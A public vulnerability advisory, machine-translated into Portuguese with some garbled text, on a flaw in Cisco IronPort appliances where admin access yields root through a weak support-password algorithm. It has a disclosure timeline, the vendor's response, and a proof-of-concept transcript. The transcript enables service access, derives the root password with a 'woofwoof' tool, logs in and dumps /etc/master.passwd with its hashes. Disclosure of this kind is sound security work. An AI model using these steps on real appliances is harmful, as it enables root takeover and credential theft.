Atualizado para Linux
Cisco Ironport Appliances Privilégio Vulnerabilidade do privilégio fornecedor: http://www.cisco.com Versão (s) afetada (s): Cisco Ironport ESA - Asyncos 8.5.5-280 Cisco Ironport WSA - ASYNCOS 8.0.5-075 CISCO IRRONSCO SMA SMA SMA SMA - Asyncos 8.3.6-0 Data: 22/05/2014 Créditos: Glafkos Charalambous CVE: Não atribuído pela Cisco
Cronograma de divulgação: 19-05-2014: Notificação do fornecedor 20-05-2014: Resposta/feedback do fornecedor 27-08-2014: FIX/patch do fornecedor 24-01-2015: Divulgação pública
Descrição: Os aparelhos da Cisco Ironport são vulneráveis à escalada autenticada de "admin" privilégios. Ao ativar a conta de serviço da GUI ou CLI, permite que um administrador obtenha acesso raiz no dispositivo, ignorando todas as limitações de conta "admin" existentes. A vulnerabilidade se deve à implementação fraca do algoritmo no processo de geração de senha, usado pela Cisco para acessar remotamente o dispositivo para fornecer suporte técnico.
Resposta do fornecedor: Como previsto, isso não é considerado uma vulnerabilidade, mas um problema de endurecimento da segurança. Como tal, não atribuímos um CVE, no entanto, garanti que isso seja fixado na SMA, ESA e WSA. A correção incluiu várias alterações, como proteger melhor o algoritmo no binário, alterando o algoritmo para ser mais robusto e aplicar a complexidade da senha quando o administrador definir o frase e ativar a conta.
[SD] NOTA: São necessárias credenciais administrativas para ativar o acesso para apoiar o representante e configurar a frase que ela é usada para calcular a senha final. [GC] O usuário do administrador ainda possui permissões limitadas no aparelho e as credenciais também podem ser comprometidas, mesmo com a senha padrão levando ao acesso total à raiz.
[SD] Este problema é rastreado para a ESA pela Cisco Bug ID: CSCUO96011 para a SMA pela Cisco Bug ID: CSCUO96056 e para WSA por Cisco Bug Id CSCUO90528
Detalhes técnicos: Ao fazer login no dispositivo usando a senha padrão "Ironport" ou o usuário especificado, existe uma opção para ativar o acesso remoto de suporte ao cliente. Esta opção pode ser encontrada em ajuda e suporte -> acesso remoto na GUI ou usando a conta do console da CLI "Enablediag" e emitindo o serviço de comando. A ativação deste serviço requer uma senha temporária de usuário que deve ser fornecida juntamente com o número de série do dispositivo ao Cisco TechSupport para conectar e autenticar remotamente o dispositivo.
Tendo uma senha temporária e o número de série do aparelho, permitindo que a conta de serviço, um invasor pode, por sua vez, obter acesso total à raiz, além de potencialmente danificá -lo, backdoor, etc.
POC:
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
gcc -std=99 -o woofwoof woofwoof.c -lcrypto
./woofwoof
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
./woofwoof -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 [email protected]:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin